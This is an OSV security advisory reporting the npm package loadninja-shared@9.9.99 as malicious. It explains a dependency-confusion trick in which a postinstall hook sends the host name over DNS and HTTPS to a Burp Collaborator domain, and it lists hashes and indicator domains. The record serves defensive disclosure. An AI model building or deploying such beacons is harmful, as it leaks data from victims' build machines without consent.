MAL-2026-5744

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/loadninja-shared/MAL-2026-5744.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5744
Published
2026-06-13T20:03:43Z
Modified
2026-06-13T20:46:41.191477820Z
Summary
Malicious code in loadninja-shared (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (dc01a627a5f67d1af201bfe6575973437cce899d9767312d44a40369dc16cc46)

loadninja-shared@9.9.99 is a dependency-confusion package targeting an internal/private package namespace. package.json declares "postinstall": "node beacon.js", which fires automatically on npm install. beacon.js reads os.hostname() and transmits it — together with a nonce and the package name — to the attacker-controlled out-of-band domain tspeuj1fodn3cj8v30uck2fs4jaby1mq.oastify.com (Burp Collaborator infrastructure) over both a DNS lookup (dns.lookup(NONCE + '.' + host63 + '.' + HOST,...)) and an HTTPS POST. The version 9.9.99 is the canonical high-version trick used to win npm resolution against a legitimate internal package of the same name, capturing misrouted internal builds. Although a code comment labels the file a "benign PoC," the behavior is identical to a live dependency-confusion exploitation beacon: any installer that resolves this package leaks its host identifier to a third-party callback domain without consent.

Source: ossf-package-analysis (1ead72fc15074f049a104031ef60cad8af0f0680d1bf5ffee1492f500a3506d8)

The OpenSSF Package Analysis project identified 'loadninja-shared' @ 9.9.99 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006370",
            "import_time": "2026-06-13T20:33:18.482928563Z",
            "sha256": "4d2bec7384a59c29b1f8dc5ca186674f7462dfc1c7768326606dcf855ba46fc7",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T20:11:52Z",
            "versions": [
                "9.9.99"
            ]
        },
        {
            "id": "IN-MAL-2026-006369",
            "versions": [
                "9.9.99"
            ],
            "sha256": "dc01a627a5f67d1af201bfe6575973437cce899d9767312d44a40369dc16cc46",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T20:11:52Z",
            "import_time": "2026-06-13T20:33:18.450827318Z"
        },
        {
            "import_time": "2026-06-13T20:33:16.835584204Z",
            "sha256": "1ead72fc15074f049a104031ef60cad8af0f0680d1bf5ffee1492f500a3506d8",
            "source": "ossf-package-analysis",
            "modified_time": "2026-06-13T20:03:43Z",
            "versions": [
                "9.9.99"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / loadninja-shared

Package: npm / loadninja-shared
Affected ranges: 9.*
Affected versions: 9.9.99

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "beacon.js",
            "sha256": "8c192b85697649c4333289e69736e35222e82facf81728fdf61be9ba093d01ba",
            "tlsh": "a621c8ff6498a1413fa675c9d26f32251123d2628285cfe0f4afd1696f5853942934fc"
        },
        {
            "path": "package.json",
            "sha256": "77a8edc1f9eb6c6c41bb5b14c238ff45f94aab6a56722d3cea1cf0f291983fbc",
            "tlsh": "2fd0a7544d059b7720c44aa98c62d50e75710c5f5128b4084f83110471eabb358ba20e"
        }
    ],
    "package_integrity": [
        {
            "filename": "loadninja-shared-9.9.99.tgz",
            "hashes": {
                "sha512_sri": "sha512-UhHVLc2TiZqoMKhzkCkSNYicTbXR/pwQZf6y6HB2S2W/oxB9qcmB1sw0ViabluBPaDyPVClTkKFr5Pkw+ITNkQ==",
                "sha1": "3844b713aa3b94ced6c3067f6fe36a65004b1947"
            }
        }
    ],
    "domains": [
        "c649856e.scan-6aec7d6ce796.tspeuj1fodn3cj8v30uck2fs4jaby1mq.oastify.com",
        "tspeuj1fodn3cj8v30uck2fs4jaby1mq.oastify.com"
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/loadninja-shared/MAL-2026-5744.json"